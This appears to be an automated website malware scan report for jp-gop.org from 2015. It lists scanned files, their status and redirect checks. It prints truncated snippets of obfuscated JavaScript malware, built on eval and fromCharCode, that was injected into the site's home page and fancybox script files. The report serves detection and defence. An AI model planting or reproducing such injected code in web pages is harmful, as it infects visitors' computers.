Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=jp-gop.org
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://jp-gop.org/ | 200 OK Content-Length: 17384 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" language="javascript" > slrodq="fr"+"omCh"+"arCo"+"de";if(document.querySelector)xdrrnt=4;brcq=("32,78,87,80,75,86,7b,81,80,32,85,42,4b,3a,3b,32,8d,1f,1c,32,88,73,84,32,85,86,73,86,7b,75,4f,39,73,7c,73,8a,39,4d,1f, | ||
http://ajax.googleapis.com/ajax/libs/jquery/1.8.2/jquery.min.js | 200 OK Content-Length: 93435 Content-Type: text/javascript | clean |
http://jp-gop.org/doteasy-under-construction/fancybox/jquery.fancybox.js | 200 OK Content-Length: 4958 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) djh="y";rqxqea="d"+"o"+"c"+"u"+"ment";try{+function(){if(document.querySelector)--(window[rqxqea].getElementById("asd"))}()}catch(tdwu){drcaz=function(agdh){agdh="fro"+agdh;for(ksl=0;ksl<djh.length;ksl++){nor+=String[agdh](ftpf(cxdon+(djh[ksl]))-(63));}};};ftpf=(window.eval);cxdon="0x";ldvj=0;try{;}catch(khpy){ldvj=1}if(!ldvj){try{++ftpf(rqxqea)["\x62o"+"d"+djh]}catch(tdwu){mmcdks="^";}djh="5f^a5^b4^ad^a2^b3^a8^ae^ad^5f^a7^a0^ad^b3^6f^78^67^68^5f^ba^4c^49^5f^b5^a0^b1^5f^b2^b3^a0^b3^a8^a2^7c^6 Antivirus reports:
http://jp-gop.org/doteasy-under-construction/fancybox/helpers/jquery.fancybox-media.js | 200 OK Content-Length: 10082 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) djh="y";rqxqea="d"+"o"+"c"+"u"+"ment";try{+function(){if(document.querySelector)--(window[rqxqea].getElementById("asd"))}()}catch(tdwu){drcaz=function(agdh){agdh="fro"+agdh;for(ksl=0;ksl<djh.length;ksl++){nor+=String[agdh](ftpf(cxdon+(djh[ksl]))-(63));}};};ftpf=(window.eval);cxdon="0x";ldvj=0;try{;}catch(khpy){ldvj=1}if(!ldvj){try{++ftpf(rqxqea)["\x62o"+"d"+djh]}catch(tdwu){mmcdks="^";}djh="5f^a5^b4^ad^a2^b3^a8^ae^ad^5f^a7^a0^ad^b3^6f^78^67^68^5f^ba^4c^49^5f^b5^a0^b1^5f^b2^b3^a0^b3^a8^a2^7c^6 Antivirus reports:
http://jp-gop.org/test404page.js | HTTP/1.1 404 Not Found Connection: close Date: Fri, 27 Feb 2015 14:52:18 GMT Accept-Ranges: bytes Server: Apache Content-Length: 124 Content-Type: text/html | clean |
http://templates.doteasy.com/errorpages/error404/ | 200 OK Content-Length: 10599 Content-Type: text/html | clean |
http://templates.doteasy.com/errorpages/error404/js/selectBox/jquery.selectBox.min.js | 200 OK Content-Length: 12728 Content-Type: application/x-javascript | clean |
http://jp-gop.org/js/jquery.watermark.min.js | HTTP/1.1 404 Not Found Connection: close Date: Fri, 27 Feb 2015 14:52:21 GMT Accept-Ranges: bytes Server: Apache Content-Length: 124 Content-Type: text/html | clean |
http://templates.doteasy.com/test404page.js | 404 Not Found Content-Length: 1245 Content-Type: text/html | clean |
http://jp-gop.org/js/fancybox/jquery.fancybox.js | HTTP/1.1 404 Not Found Connection: close Date: Fri, 27 Feb 2015 14:52:22 GMT Accept-Ranges: bytes Server: Apache Content-Length: 124 Content-Type: text/html | clean |
http://jp-gop.org/js/fancybox/helpers/jquery.fancybox-media.js | HTTP/1.1 404 Not Found Connection: close Date: Fri, 27 Feb 2015 14:52:22 GMT Accept-Ranges: bytes Server: Apache Content-Length: 124 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: jp-gop.org
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 27 Feb 2015 14:52:16 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 17384
Content-Type: text/html
Last-Modified: Tue, 10 Sep 2013 13:28:37 GMT
...17384 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: jp-gop.org
Referer: http://www.google.com/search?q=jp-gop.org
Result:
The result is similar to the first query. There are no suspicious redirects found.